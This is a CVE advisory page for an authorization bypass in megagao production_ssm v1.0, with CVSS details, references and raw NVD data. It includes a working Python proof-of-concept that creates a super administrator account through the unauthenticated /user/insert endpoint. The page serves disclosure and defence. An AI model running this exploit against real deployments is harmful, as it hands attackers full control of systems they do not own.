CVE-2026-31271

Description

megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

megagao production_ssm v1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests def exploit(target_url): """ Exploit for CVE-2026-31271: Authorization bypass in user addition. Creates a super administrator account without authentication. """ # The vulnerable endpoint endpoint = "/user/insert" url = f"{target_url}{endpoint}" # Payload to create a new super admin # Adjust field names based on the actual backend implementation payload = { "username": "admin2", "password": "password123", "role": "1", # Assuming '1' represents the super admin role "email": "[email protected]" } try: response = requests.post(url, data=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Super admin account created.") print(f"[+] Username: {payload['username']}, Password: {payload['password']}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31271
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31271
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31271/
[4] VulDB https://vuldb.com/cve/CVE-2026-31271
[5] https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31271", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:41.000", "lastModified": "2026-04-09T14:16:30.317", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md", "source": "[email protected]"}]}}